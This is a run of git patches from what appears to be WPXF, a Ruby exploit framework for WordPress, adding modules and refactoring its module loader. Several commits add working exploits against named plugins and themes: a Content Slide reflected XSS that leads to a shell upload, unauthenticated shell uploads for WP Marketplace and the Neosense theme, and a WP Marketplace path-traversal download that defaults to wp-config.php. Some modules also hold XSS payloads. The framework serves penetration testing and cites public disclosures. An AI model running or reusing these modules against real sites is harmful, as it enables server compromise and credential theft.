From 2364e27ed7a5c995777530ce0674324c8d569704 Mon Sep 17 00:00:00 2001
From: phyushin <phyushin@gmail.com>
Date: Sun, 22 Jan 2017 01:59:27 +0000
Subject: [PATCH 01/48] Add "Content-Slide" reflected XSS module

---
 ...ontent_slide_reflected_xss_shell_upload.rb | 36 +++++++++++++++++++
 1 file changed, 36 insertions(+)
 create mode 100644 modules/exploits/content_slide_reflected_xss_shell_upload.rb

diff --git a/modules/exploits/content_slide_reflected_xss_shell_upload.rb b/modules/exploits/content_slide_reflected_xss_shell_upload.rb
new file mode 100644
index 0000000..585e1a2
--- /dev/null
+++ b/modules/exploits/content_slide_reflected_xss_shell_upload.rb
@@ -0,0 +1,36 @@
+class Wpxf::Exploit::ContentSlideReflectedXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::StagedReflectedXss
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Content Slide Reflected XSS Shell Upload',
+      author: [
+        'Tom Adams (dxw)',                  # Disclosure
+        'Paul Williams <phyushin@phyubox.com' # WPXF module
+      ],
+      references: [
+        ['WPVDB', '7908'],
+        ['URL', 'https://security.dxw.com/advisories/csrf-and-stored-xss-in-wordpress-content-slide-allow-an-attacker-to-have-full-admin-privileges/']
+      ],
+      date: 'Apr 16 2015'
+    )
+  end
+
+  def check
+    check_plugin_version_from_readme('content-slide')
+  end
+
+  def vulnerable_url
+    normalize_uri(wordpress_url_admin, 'admin.php?page=content-slide/content_slide.php')
+  end
+
+  def initial_script
+    create_basic_post_script(
+      vulnerable_url,
+      'wpcs_options[no_of_custom_images]' => 1,
+      'wpcs_options[slide_image1]'        => "\\\"><script>#{xss_ascii_encoded_include_script}<\\/script>"
+    )
+  end
+end

From deffe3fa83a019a84e2d95bf0eb6806ea7b04f55 Mon Sep 17 00:00:00 2001
From: Rob <rob@rastating.com>
Date: Mon, 23 Jan 2017 23:50:06 +0000
Subject: [PATCH 02/48] Add ability to use dots in module and payload file
 names

---
 lib/cli/auto_complete.rb |  6 ++---
 lib/cli/context.rb       | 34 ++------------------------
 modules/modules.rb       | 53 +++++++++++++++++++++++++---------------
 spec/modules_spec.rb     | 45 ++++++++++++++++++++++++++++++++++
 4 files changed, 83 insertions(+), 55 deletions(-)
 create mode 100644 spec/modules_spec.rb

diff --git a/lib/cli/auto_complete.rb b/lib/cli/auto_complete.rb
index 26c9e6f..5b32157 100644
--- a/lib/cli/auto_complete.rb
+++ b/lib/cli/auto_complete.rb
@@ -28,7 +28,7 @@ def refresh_autocomplete_options
 
         if mod.exploit_module?
           opts_hash['payload'] = {}
-          Wpxf::Payloads.payload_list.each { |p| opts_hash['payload'][p] = {} }
+          Wpxf::Payloads.payload_list.each { |p| opts_hash['payload'][p[:name]] = {} }
         end
       end
 
@@ -39,8 +39,8 @@ def refresh_autocomplete_options
     def build_cmd_list
       cmds = {}
       permitted_commands.each { |c| cmds[c] = {} }
-      Wpxf::Auxiliary.module_list.each { |m| cmds['use'][m] = {} }
-      Wpxf::Exploit.module_list.each { |m| cmds['use'][m] = {} }
+      Wpxf::Auxiliary.module_list.each { |m| cmds['use'][m[:name]] = {} }
+      Wpxf::Exploit.module_list.each { |m| cmds['use'][m[:name]] = {} }
       cmds['show'] = {
         'options' => {},
         'advanced' => {},
diff --git a/lib/cli/context.rb b/lib/cli/context.rb
index cd0d7e3..ea29d0c 100644
--- a/lib/cli/context.rb
+++ b/lib/cli/context.rb
@@ -1,9 +1,6 @@
 module Cli
   # A context which modules will be used in.
   class Context
-    def initialize
-    end
-
     def class_name(path_name)
       return path_name if path_name !~ /_/ && path_name =~ /[A-Z]+.*/
       path_name.split('_').map(&:capitalize).join
@@ -14,22 +11,7 @@ def verbose?
     end
 
     def load_module(path)
-      match = path.match(/(auxiliary|exploit)\/(.+)/i)
-      raise 'Invalid module path' unless match
-
-      type = match.captures[0]
-      name = class_name(match.captures[1])
-
-      begin
-        if type.eql? 'auxiliary'
-          @module = Wpxf::Auxiliary.const_get(name).new
-        elsif type.eql? 'exploit'
-          @module = Wpxf::Exploit.const_get(name).new
-        end
-      rescue NameError
-        raise 'Invalid module name'
-      end
-
+      @module = Wpxf.load_module(path)
       @module_path = path
       @module
     end
@@ -45,19 +27,7 @@ def reload
     end
 
     def load_payload(name)
-      clsid = class_name(name)
-
-      if Wpxf::Payloads.const_defined?(clsid)
-        payload_class = Wpxf::Payloads.const_get(clsid)
-        if payload_class.is_a?(Class)
-          self.module.payload = payload_class.new
-        else
-          fail "\"#{name}\" is not a valid payload"
-        end
-      else
-        fail "\"#{name}\" is not a valid payload"
-      end
-
+      self.module.payload = Wpxf::Payloads.load_payload(name)
       self.module.payload.check(self.module)
       self.module.payload
     end
diff --git a/modules/modules.rb b/modules/modules.rb
index 6605623..88ce04e 100644
--- a/modules/modules.rb
+++ b/modules/modules.rb
@@ -1,29 +1,40 @@
 module Wpxf
-  def self.underscore(module_name)
-    module_name.gsub(/::/, '/').
-                gsub(/([A-Z]+)([A-Z][a-z])/,'\1_\2').
-                gsub(/([a-z\d])([A-Z])/,'\1_\2').
-                tr("-", "_").
-                downcase
+  def self.build_module_list(namespace, id_prefix = '')
+    modules = namespace.constants.select do |c|
+      namespace.const_get(c).is_a? Class
+    end
+
+    modules.map do |m|
+      klass = namespace.const_get(m)
+      filename = klass.new.method(:initialize).source_location[0]
+      {
+        class: klass,
+        name: "#{id_prefix}#{File.basename(filename, '.rb')}"
+      }
+    end
+  end
+
+  def self.load_module(name)
+    match = name.match(/(auxiliary|exploit)\/(.+)/i)
+    raise 'Invalid module path' unless match
+
+    type = match.captures[0]
+    list = type == 'auxiliary' ? Wpxf::Auxiliary.module_list : Wpxf::Exploit.module_list
+
+    mod = list.find { |p| p[:name] == name }
+    raise "\"#{name}\" is not a valid module" if mod.nil?
+    mod[:class].new
   end
 
   module Auxiliary
     def self.module_list
-      modules = Wpxf::Auxiliary.constants.select do |c|
-        Wpxf::Auxiliary.const_get(c).is_a? Class
-      end
-
-      modules.map { |m| "auxiliary/#{Wpxf.underscore(m.to_s)}" }
+      @@modules ||= Wpxf.build_module_list(Wpxf::Auxiliary, 'auxiliary/')
     end
   end
 
   module Exploit
     def self.module_list
-      modules = Wpxf::Exploit.constants.select do |c|
-        Wpxf::Exploit.const_get(c).is_a? Class
-      end
-
-      modules.map { |m| "exploit/#{Wpxf.underscore(m.to_s)}" }
+      @@modules ||= Wpxf.build_module_list(Wpxf::Exploit, 'exploit/')
     end
   end
 
@@ -37,11 +48,13 @@ def self.payload_count
     end
 
     def self.payload_list
-      payloads = Wpxf::Payloads.constants.select do |c|
-        Wpxf::Payloads.const_get(c).is_a? Class
-      end
+      @@payloads ||= Wpxf.build_module_list(Wpxf::Payloads)
+    end
 
-      payloads.map { |p| Wpxf.underscore(p.to_s) }
+    def self.load_payload(name)
+      payload = payload_list.find { |p| p[:name] == name }
+      raise "\"#{name}\" is not a valid payload" if payload.nil?
+      payload[:class].new
     end
   end
 end
diff --git a/spec/modules_spec.rb b/spec/modules_spec.rb
new file mode 100644
index 0000000..6df48e2
--- /dev/null
+++ b/spec/modules_spec.rb
@@ -0,0 +1,45 @@
+require_relative 'spec_helper'
+require 'modules'
+
+describe Wpxf do
+  describe '.build_module_list' do
+    it 'builds an array of hashes containing the modules for the specified namespace' do
+      result = Wpxf.build_module_list(Wpxf::Exploit, 'exploit/')
+      expect(result[0]).to include(:class, :name)
+
+      mod = result.find { |m| m[:name] == 'exploit/admin_shell_upload' }
+      expect(mod).to_not be_nil
+      expect(mod[:class]).to be Wpxf::Exploit::AdminShellUpload
+    end
+  end
+end
+
+describe 'Wpxf::Auxiliary' do
+  describe '.module_list' do
+    it 'builds an array of hashes containing the auxiliary modules' do
+      list = Wpxf::Auxiliary.module_list
+      expect(list).to_not be_nil
+      expect(list[0]).to include(:class, :name)
+    end
+  end
+end
+
+describe 'Wpxf::Exploit' do
+  describe '.module_list' do
+    it 'builds an array of hashes containing the exploit modules' do
+      list = Wpxf::Exploit.module_list
+      expect(list).to_not be_nil
+      expect(list[0]).to include(:class, :name)
+    end
+  end
+end
+
+describe 'Wpxf::Payloads' do
+  describe '.payload_list' do
+    it 'builds an array of hashes containing the module payloads' do
+      list = Wpxf::Payloads.payload_list
+      expect(list).to_not be_nil
+      expect(list[0]).to include(:class, :name)
+    end
+  end
+end

From b49069295bc2c5c6e9613dc2306a09af0296afe8 Mon Sep 17 00:00:00 2001
From: Rob <rob@rastating.com>
Date: Mon, 23 Jan 2017 23:50:43 +0000
Subject: [PATCH 03/48] Rename modules that have version identifiers in the
 file name

---
 ...47_user_info_disclosure.rb => wp_v4.7_user_info_disclosure.rb} | 0
 ...pload.rb => n_media_website_contact_form_v1.9_shell_upload.rb} | 0
 ..._xss_shell_upload.rb => wp_v4.3_shortcode_xss_shell_upload.rb} | 0
 .../{wp44_xss_shell_upload.rb => wp_v4.4_xss_shell_upload.rb}     | 0
 4 files changed, 0 insertions(+), 0 deletions(-)
 rename modules/auxiliary/{wp47_user_info_disclosure.rb => wp_v4.7_user_info_disclosure.rb} (100%)
 rename modules/exploits/{n_media_website_contact_form_v19_shell_upload.rb => n_media_website_contact_form_v1.9_shell_upload.rb} (100%)
 rename modules/exploits/{wp43_shortcode_xss_shell_upload.rb => wp_v4.3_shortcode_xss_shell_upload.rb} (100%)
 rename modules/exploits/{wp44_xss_shell_upload.rb => wp_v4.4_xss_shell_upload.rb} (100%)

diff --git a/modules/auxiliary/wp47_user_info_disclosure.rb b/modules/auxiliary/wp_v4.7_user_info_disclosure.rb
similarity index 100%
rename from modules/auxiliary/wp47_user_info_disclosure.rb
rename to modules/auxiliary/wp_v4.7_user_info_disclosure.rb
diff --git a/modules/exploits/n_media_website_contact_form_v19_shell_upload.rb b/modules/exploits/n_media_website_contact_form_v1.9_shell_upload.rb
similarity index 100%
rename from modules/exploits/n_media_website_contact_form_v19_shell_upload.rb
rename to modules/exploits/n_media_website_contact_form_v1.9_shell_upload.rb
diff --git a/modules/exploits/wp43_shortcode_xss_shell_upload.rb b/modules/exploits/wp_v4.3_shortcode_xss_shell_upload.rb
similarity index 100%
rename from modules/exploits/wp43_shortcode_xss_shell_upload.rb
rename to modules/exploits/wp_v4.3_shortcode_xss_shell_upload.rb
diff --git a/modules/exploits/wp44_xss_shell_upload.rb b/modules/exploits/wp_v4.4_xss_shell_upload.rb
similarity index 100%
rename from modules/exploits/wp44_xss_shell_upload.rb
rename to modules/exploits/wp_v4.4_xss_shell_upload.rb

From c61a4499316bb2c565e0b29757e2ef15aba58787 Mon Sep 17 00:00:00 2001
From: Rob <rob@rastating.com>
Date: Tue, 24 Jan 2017 21:21:26 +0000
Subject: [PATCH 04/48] Fix inconsistent spacing

---
 modules/exploits/content_slide_reflected_xss_shell_upload.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/content_slide_reflected_xss_shell_upload.rb b/modules/exploits/content_slide_reflected_xss_shell_upload.rb
index 585e1a2..cce2eb3 100644
--- a/modules/exploits/content_slide_reflected_xss_shell_upload.rb
+++ b/modules/exploits/content_slide_reflected_xss_shell_upload.rb
@@ -7,7 +7,7 @@ def initialize
     update_info(
       name: 'Content Slide Reflected XSS Shell Upload',
       author: [
-        'Tom Adams (dxw)',                  # Disclosure
+        'Tom Adams (dxw)',                    # Disclosure
         'Paul Williams <phyushin@phyubox.com' # WPXF module
       ],
       references: [

From b242159da64491af818310206cb89a0148f226e8 Mon Sep 17 00:00:00 2001
From: Rob <rob@rastating.com>
Date: Thu, 26 Jan 2017 21:47:28 +0000
Subject: [PATCH 05/48] Add "exit" command to CLI

---
 lib/cli/console.rb | 1 +
 1 file changed, 1 insertion(+)

diff --git a/lib/cli/console.rb b/lib/cli/console.rb
index d85bfca..5457ab5 100644
--- a/lib/cli/console.rb
+++ b/lib/cli/console.rb
@@ -103,6 +103,7 @@ def on_event_emitted(event)
     end
 
     def execute_user_command(command, args)
+      command = 'quit' if command == 'exit'
       if can_handle? command
         puts unless commands_without_output.include? command
         send(command, *args) if correct_number_of_args?(command, args)

From 1a10fa2a28d8f3c5eef316a9a30eed0c2b7062db Mon Sep 17 00:00:00 2001
From: Rob <rob@rastating.com>
Date: Fri, 27 Jan 2017 23:13:13 +0000
Subject: [PATCH 06/48] Add option name auto-complete for gset and gunset
 commands

Closes #34
---
 lib/cli/auto_complete.rb | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/lib/cli/auto_complete.rb b/lib/cli/auto_complete.rb
index 5b32157..663143c 100644
--- a/lib/cli/auto_complete.rb
+++ b/lib/cli/auto_complete.rb
@@ -34,6 +34,8 @@ def refresh_autocomplete_options
 
       @autocomplete_list['set'] = opts_hash
       @autocomplete_list['unset'] = opts_hash
+      @autocomplete_list['gset'] = opts_hash
+      @autocomplete_list['gunset'] = opts_hash
     end
 
     def build_cmd_list

From c36725e661fe1c5e176783b81c1733003134d2d8 Mon Sep 17 00:00:00 2001
From: Rob <rob@rastating.com>
Date: Sat, 28 Jan 2017 20:30:15 +0000
Subject: [PATCH 07/48] Change search function to use new module_list methods

---
 lib/cli/modules.rb | 6 ++----
 1 file changed, 2 insertions(+), 4 deletions(-)

diff --git a/lib/cli/modules.rb b/lib/cli/modules.rb
index ae0047e..890116e 100644
--- a/lib/cli/modules.rb
+++ b/lib/cli/modules.rb
@@ -45,10 +45,8 @@ def search_modules(args)
       module_list = Wpxf::Auxiliary.module_list + Wpxf::Exploit.module_list
 
       results = []
-      module_list.select { |m| m =~ pattern }.each do |path|
-        context = Context.new
-        context.load_module(path)
-        results.push(path: path, title: context.module.module_name)
+      module_list.select { |m| m[:name] =~ pattern }.each do |mod|
+        results.push(path: mod[:name], title: mod[:class].new.module_name)
       end
 
       results

From e79b23100c2c920a5563b3135652e7b3399ff201 Mon Sep 17 00:00:00 2001
From: Rob <rob@rastating.com>
Date: Sat, 28 Jan 2017 21:10:11 +0000
Subject: [PATCH 08/48] Add WP Marketplace shell upload

---
 .../exploits/wp_marketplace_shell_upload.rb   | 38 +++++++++++++++++++
 1 file changed, 38 insertions(+)
 create mode 100644 modules/exploits/wp_marketplace_shell_upload.rb

diff --git a/modules/exploits/wp_marketplace_shell_upload.rb b/modules/exploits/wp_marketplace_shell_upload.rb
new file mode 100644
index 0000000..e5843bf
--- /dev/null
+++ b/modules/exploits/wp_marketplace_shell_upload.rb
@@ -0,0 +1,38 @@
+class Wpxf::Exploit::WpMarketplaceShellUpload < Wpxf::Module
+  include Wpxf::WordPress::ShellUpload
+
+  def initialize
+    super
+
+    update_info(
+      name: 'WP Marketplace Unauthenticated Shell Upload',
+      author: [
+        'White Fir Design',               # Discovery and disclosure
+        'Rob Carr <rob[at]rastating.com>' # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8642'],
+        ['URL', 'http://labs.sucuri.net/?note=2016-10-17']
+      ],
+      date: 'Oct 14 2016'
+    )
+  end
+
+  def check
+    check_plugin_version_from_readme('wpmarketplace')
+  end
+
+  def uploader_url
+    normalize_uri(wordpress_url_admin, 'admin-post.php?task=wpmp_upload_previews')
+  end
+
+  def payload_body_builder
+    builder = Utility::BodyBuilder.new
+    builder.add_file_from_string('Filedata', payload.encoded, payload_name)
+    builder
+  end
+
+  def uploaded_payload_location
+    normalize_uri(wordpress_url_uploads, 'wpmp-previews', upload_result.body)
+  end
+end

From 38798321ef3d72a2dac7f805ead1596c0bf0dab3 Mon Sep 17 00:00:00 2001
From: Rob <rob@rastating.com>
Date: Sat, 28 Jan 2017 21:38:01 +0000
Subject: [PATCH 09/48] Add #before_download method to FileDownload mixin

---
 lib/wpxf/wordpress/file_download.rb  | 8 +++++++-
 spec/wordpress/file_download_spec.rb | 6 ++++++
 2 files changed, 13 insertions(+), 1 deletion(-)

diff --git a/lib/wpxf/wordpress/file_download.rb b/lib/wpxf/wordpress/file_download.rb
index 768fb5b..4b0e28a 100644
--- a/lib/wpxf/wordpress/file_download.rb
+++ b/lib/wpxf/wordpress/file_download.rb
@@ -76,12 +76,18 @@ def validate_content(content)
     true
   end
 
+  # A task to run before the download starts.
+  # @return [Boolean] true if pre-download operations were successful.
+  def before_download
+    true
+  end
+
   # Run the module.
   # @return [Boolean] true if successful.
   def run
     validate_implementation
 
-    return false unless super
+    return false unless super || !before_download
 
     res = request_file
     return false unless validate_result(res) && validate_content(res.body)
diff --git a/spec/wordpress/file_download_spec.rb b/spec/wordpress/file_download_spec.rb
index f6b2155..3208e7d 100644
--- a/spec/wordpress/file_download_spec.rb
+++ b/spec/wordpress/file_download_spec.rb
@@ -38,5 +38,11 @@
         'A value must be specified for #working_directory'
       )
     end
+
+    it 'when #before_download returns false, return false' do
+      allow(subject).to receive(:before_download).and_return(false)
+      allow(subject).to receive(:working_directory).and_return('wp-content')
+      expect(subject.run).to be false
+    end
   end
 end

From 358102a928ba5be20cfa212aad1c580349ba93a7 Mon Sep 17 00:00:00 2001
From: Rob <rob@rastating.com>
Date: Sat, 28 Jan 2017 23:36:45 +0000
Subject: [PATCH 10/48] Split concatenated conditions into two separate lines

---
 lib/wpxf/wordpress/file_download.rb | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/lib/wpxf/wordpress/file_download.rb b/lib/wpxf/wordpress/file_download.rb
index 4b0e28a..ac8f432 100644
--- a/lib/wpxf/wordpress/file_download.rb
+++ b/lib/wpxf/wordpress/file_download.rb
@@ -87,7 +87,8 @@ def before_download
   def run
     validate_implementation
 
-    return false unless super || !before_download
+    return false unless super
+    return false unless before_download
 
     res = request_file
     return false unless validate_result(res) && validate_content(res.body)

From ee7ae0f6d52e565c26f0b96188f699d1177efb3d Mon Sep 17 00:00:00 2001
From: Rob <rob@rastating.com>
Date: Sat, 28 Jan 2017 23:59:49 +0000
Subject: [PATCH 11/48] Update format for CVE reference inflation

---
 lib/wpxf/utility/reference_inflater.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/wpxf/utility/reference_inflater.rb b/lib/wpxf/utility/reference_inflater.rb
index ac2d88c..ec69802 100644
--- a/lib/wpxf/utility/reference_inflater.rb
+++ b/lib/wpxf/utility/reference_inflater.rb
@@ -22,7 +22,7 @@ def format_strings
         {
           'WPVDB' => 'https://wpvulndb.com/vulnerabilities/%s',
           'OSVDB' => 'http://www.osvdb.org/%s',
-          'CVE'   => 'http://www.cvedetails.com/cve/%s',
+          'CVE'   => 'http://www.cvedetails.com/cve/CVE-%s',
           'EDB'   => 'https://www.exploit-db.com/exploits/%s',
           'URL'   => '%s'
         }

From 67257753e44de3c3ac2e3425f0930e3b238b2dd8 Mon Sep 17 00:00:00 2001
From: Rob <rob@rastating.com>
Date: Sun, 29 Jan 2017 00:00:45 +0000
Subject: [PATCH 12/48] Update unit test for CVE inflation

---
 spec/utility/reference_inflater_spec.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/spec/utility/reference_inflater_spec.rb b/spec/utility/reference_inflater_spec.rb
index 024185c..eb078b0 100644
--- a/spec/utility/reference_inflater_spec.rb
+++ b/spec/utility/reference_inflater_spec.rb
@@ -27,7 +27,7 @@
 
     it 'inflates CVE references' do
       subject = Wpxf::Utility::ReferenceInflater.new('CVE')
-      expect(subject.inflate(12)).to eq 'http://www.cvedetails.com/cve/12'
+      expect(subject.inflate(12)).to eq 'http://www.cvedetails.com/cve/CVE-12'
     end
 
     it 'inflates Exploit DB references' do

From 5c3a18500cc9c4e9cd17c8fc0598e5355acd81ea Mon Sep 17 00:00:00 2001
From: Rob <rob@rastating.com>
Date: Sun, 29 Jan 2017 00:01:42 +0000
Subject: [PATCH 13/48] Add WP Marketplace <= 2.4 file download

---
 .../wp_marketplace_v2.4_file_download.rb      | 139 ++++++++++++++++++
 1 file changed, 139 insertions(+)
 create mode 100644 modules/auxiliary/wp_marketplace_v2.4_file_download.rb

diff --git a/modules/auxiliary/wp_marketplace_v2.4_file_download.rb b/modules/auxiliary/wp_marketplace_v2.4_file_download.rb
new file mode 100644
index 0000000..bd0a880
--- /dev/null
+++ b/modules/auxiliary/wp_marketplace_v2.4_file_download.rb
@@ -0,0 +1,139 @@
+class Wpxf::Auxiliary::WpMarketplaceV24FileDownload < Wpxf::Module
+  include Wpxf::WordPress::FileDownload
+
+  def initialize
+    super
+
+    update_info(
+      name: 'WP Marketplace <= 2.4.0 Arbitrary File Download',
+      desc: %(
+        This module exploits a vulnerability which allows registered users of any level
+        to download any arbitrary file accessible by the user the web server is running as.
+      ),
+      author: [
+        'Kacper Szurek',                  # Disclosure
+        'Rob Carr <rob[at]rastating.com>' # WPXF module
+      ],
+      references: [
+        ['WPVDB', '7861'],
+        ['CVE', '2014-9013'],
+        ['CVE', '2014-9014'],
+        ['URL', 'http://security.szurek.pl/wp-marketplace-240-arbitrary-file-download.html']
+      ],
+      date: 'Mar 21 2015'
+    )
+
+    register_options([
+      StringOption.new(
+        name: 'user_role',
+        desc: 'The role of the user account being used for authentication',
+        default: 'Subscriber',
+        required: true
+      )
+    ])
+  end
+
+  def check
+    check_plugin_version_from_changelog('wpmarketplace', 'readme.txt', '2.4.1')
+  end
+
+  def requires_authentication
+    true
+  end
+
+  def default_remote_file_path
+    '../../../wp-config.php'
+  end
+
+  def working_directory
+    'wp-content/plugins/wpmarketplace'
+  end
+
+  def modify_plugin_permissions
+    res = execute_post_request(
+      url: full_uri,
+      body: {
+        'action'                      => 'wpmp_pp_ajax_call',
+        'execute'                     => 'wpmp_save_settings',
+        '_wpmp_settings[user_role][]' => datastore['user_role'].downcase
+      },
+      cookie: session_cookie
+    )
+
+    unless res && res.code == 200 && res.body =~ /Settings Saved Successfully/i
+      emit_error 'Failed to modify the plugin permissions'
+      return false
+    end
+
+    true
+  end
+
+  def fetch_ajax_nonce
+    res = execute_post_request(
+      url: full_uri,
+      body: {
+        'action'  => 'wpmp_pp_ajax_call',
+        'execute' => 'wpmp_front_add_product'
+      },
+      cookie: session_cookie
+    )
+
+    return nil if !res || res.code != 200
+    nonce = res.body[/name="__product_wpmp" value="([^"]+)"/i, 1]
+
+    unless nonce
+      emit_error 'Failed to acquire a download nonce'
+      emit_error res.inspect, true
+      return false
+    end
+
+    nonce
+  end
+
+  def create_product
+    res = execute_post_request(
+      url: full_uri,
+      body: {
+        '__product_wpmp' => @nonce,
+        'post_type' => 'wpmarketplace',
+        'id' => @download_id,
+        'wpmp_list[base_price]' => '0',
+        'wpmp_list[file][]' => remote_file
+      },
+      cookie: session_cookie
+    )
+
+    unless res && (res.code == 200 || res.code == 302)
+      emit_error 'Failed to create dummy product'
+      emit_error res.inspect, true
+      return false
+    end
+
+    true
+  end
+
+  def before_download
+    return false unless modify_plugin_permissions
+    emit_info 'Modified plugin permissions successfully', true
+
+    @nonce = fetch_ajax_nonce
+    return false unless @nonce
+
+    emit_info "Acquired nonce \"#{@nonce}\"", true
+    @download_id = "1#{Utility::Text.rand_numeric(5)}"
+
+    create_product
+  end
+
+  def download_request_method
+    :post
+  end
+
+  def downloader_url
+    full_uri
+  end
+
+  def download_request_params
+    { 'wpmpfile' => @download_id }
+  end
+end

From b6676ba4b25ef14f678094da4de38e0283a82c27 Mon Sep 17 00:00:00 2001
From: Rob <rob@rastating.com>
Date: Sun, 29 Jan 2017 00:47:27 +0000
Subject: [PATCH 14/48] Fix numerous Rubocop violations

---
 lib/cli/modules.rb                                     | 9 ++++++++-
 modules/exploits/wp_v4.3_shortcode_xss_shell_upload.rb | 4 ++--
 modules/exploits/wp_v4.4_xss_shell_upload.rb           | 8 ++++----
 3 files changed, 14 insertions(+), 7 deletions(-)

diff --git a/lib/cli/modules.rb b/lib/cli/modules.rb
index 890116e..d1bf872 100644
--- a/lib/cli/modules.rb
+++ b/lib/cli/modules.rb
@@ -40,13 +40,20 @@ def use(module_path)
       refresh_autocomplete_options
     end
 
+    def module_name_from_class(klass)
+      klass.new.module_name
+    end
+
     def search_modules(args)
       pattern = /#{args.map { |m| Regexp.escape(m) }.join('|')}/i
       module_list = Wpxf::Auxiliary.module_list + Wpxf::Exploit.module_list
 
       results = []
       module_list.select { |m| m[:name] =~ pattern }.each do |mod|
-        results.push(path: mod[:name], title: mod[:class].new.module_name)
+        results.push(
+          path: mod[:name],
+          title: module_name_from_class(mod[:class])
+        )
       end
 
       results
diff --git a/modules/exploits/wp_v4.3_shortcode_xss_shell_upload.rb b/modules/exploits/wp_v4.3_shortcode_xss_shell_upload.rb
index bdbddc7..a10cb36 100644
--- a/modules/exploits/wp_v4.3_shortcode_xss_shell_upload.rb
+++ b/modules/exploits/wp_v4.3_shortcode_xss_shell_upload.rb
@@ -33,7 +33,7 @@ def check
     version = wordpress_version
     return :unknown if version.nil?
     return :vulnerable if version < Gem::Version.new('4.3.1')
-    return :safe
+    :safe
   end
 
   def run
@@ -48,6 +48,6 @@ def run
     puts
 
     start_http_server
-    return @success
+    @success
   end
 end
diff --git a/modules/exploits/wp_v4.4_xss_shell_upload.rb b/modules/exploits/wp_v4.4_xss_shell_upload.rb
index 19ab445..9e75c4f 100644
--- a/modules/exploits/wp_v4.4_xss_shell_upload.rb
+++ b/modules/exploits/wp_v4.4_xss_shell_upload.rb
@@ -29,12 +29,12 @@ def check
     version = wordpress_version
     return :unknown if version.nil?
     return :vulnerable if version == Gem::Version.new('4.4')
-    return :safe
+    :safe
   end
 
   def url_with_xss
-    url = normalize_uri(wordpress_url_admin, "customize.php")
-    url += "?theme=<svg onload=#{xss_ascii_encoded_include_script}>"
+    url = normalize_uri(wordpress_url_admin, 'customize.php')
+    url + "?theme=<svg onload=#{xss_ascii_encoded_include_script}>"
   end
 
   def run
@@ -47,6 +47,6 @@ def run
     puts
 
     start_http_server
-    return @success
+    @success
   end
 end

From d41ad4001fae09c41506f84e07a8e981880688ad Mon Sep 17 00:00:00 2001
From: Rob <rob@rastating.com>
Date: Sun, 29 Jan 2017 18:49:59 +0000
Subject: [PATCH 15/48] Add default return values to method stubs

---
 lib/wpxf/wordpress/shell_upload.rb | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/lib/wpxf/wordpress/shell_upload.rb b/lib/wpxf/wordpress/shell_upload.rb
index 96bde5a..a17b509 100644
--- a/lib/wpxf/wordpress/shell_upload.rb
+++ b/lib/wpxf/wordpress/shell_upload.rb
@@ -36,14 +36,17 @@ def payload_name
 
   # @return [String] the URL of the file used to upload the payload.
   def uploader_url
+    nil
   end
 
   # @return [BodyBuilder] the {Wpxf::Utility::BodyBuilder} used to generate the uploader form.
   def payload_body_builder
+    nil
   end
 
   # @return [String] the URL of the payload after it is uploaded to the target.
   def uploaded_payload_location
+    nil
   end
 
   # Called prior to preparing and uploading the payload.

From 8a35bf81f478b77b98b8259eee06b3d4f5d66d9f Mon Sep 17 00:00:00 2001
From: Rob <rob@rastating.com>
Date: Sun, 29 Jan 2017 18:53:31 +0000
Subject: [PATCH 16/48] Add Neosense Theme <= 1.7 shell upload

---
 modules/exploits/neosense_shell_upload.rb | 39 +++++++++++++++++++++++
 1 file changed, 39 insertions(+)
 create mode 100644 modules/exploits/neosense_shell_upload.rb

diff --git a/modules/exploits/neosense_shell_upload.rb b/modules/exploits/neosense_shell_upload.rb
new file mode 100644
index 0000000..fe11ad0
--- /dev/null
+++ b/modules/exploits/neosense_shell_upload.rb
@@ -0,0 +1,39 @@
+class Wpxf::Exploit::NeosenseShellUpload < Wpxf::Module
+  include Wpxf::WordPress::ShellUpload
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Neosense Theme <= 1.7 Unauthenticated Shell Upload',
+      author: [
+        'Walter Hop',                     # Discovery and disclosure
+        'Rob Carr <rob[at]rastating.com>' # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8622'],
+        ['URL', 'https://lifeforms.nl/20160919/unrestricted-upload-neosense']
+      ],
+      date: 'Sep 19 2016'
+    )
+  end
+
+  def check
+    check_theme_version_from_style('neosense', '1.8')
+  end
+
+  def uploader_url
+    normalize_uri(wordpress_url_themes, 'neosense', 'js', 'back-end', 'libraries', 'fileuploader', 'upload_handler.php')
+  end
+
+  def payload_body_builder
+    builder = Utility::BodyBuilder.new
+    builder.add_file_from_string('qqfile', payload.encoded, payload_name)
+    builder
+  end
+
+  def uploaded_payload_location
+    result = JSON.parse(upload_result.body)
+    result['url']
+  end
+end

From 2eb64583a7e9c34021de6cc34d3433fafe733725 Mon Sep 17 00:00:00 2001
From: Rob <rob@rastating.com>
Date: Sun, 29 Jan 2017 22:49:58 +0000
Subject: [PATCH 17/48] Add #expected_upload_response_code

---
 lib/wpxf/wordpress/shell_upload.rb | 7 ++++++-
 1 file changed, 6 insertions(+), 1 deletion(-)

diff --git a/lib/wpxf/wordpress/shell_upload.rb b/lib/wpxf/wordpress/shell_upload.rb
index a17b509..878da5a 100644
--- a/lib/wpxf/wordpress/shell_upload.rb
+++ b/lib/wpxf/wordpress/shell_upload.rb
@@ -55,6 +55,11 @@ def before_upload
     true
   end
 
+  # @return [Integer] the response code to expect from a successful upload operation.
+  def expected_upload_response_code
+    200
+  end
+
   # Run the module.
   # @return [Boolean] true if successful.
   def run
@@ -101,7 +106,7 @@ def upload_payload(builder)
       return false
     end
 
-    if @upload_result.code != 200
+    if @upload_result.code != expected_upload_response_code
       emit_info "Response code: #{@upload_result.code}", true
       emit_info "Response body: #{@upload_result.body}", true
       emit_error 'Failed to upload payload'

From 14557a8a65109c7245ad02c644b171a42c033796 Mon Sep 17 00:00:00 2001
From: Rob <rob@rastating.com>
Date: Sun, 29 Jan 2017 22:50:33 +0000
Subject: [PATCH 18/48] Add Estatik <= 2.2.5 shell upload

---
 .../exploits/estatik_v2.2.5_shell_upload.rb   | 49 +++++++++++++++++++
 1 file changed, 49 insertions(+)
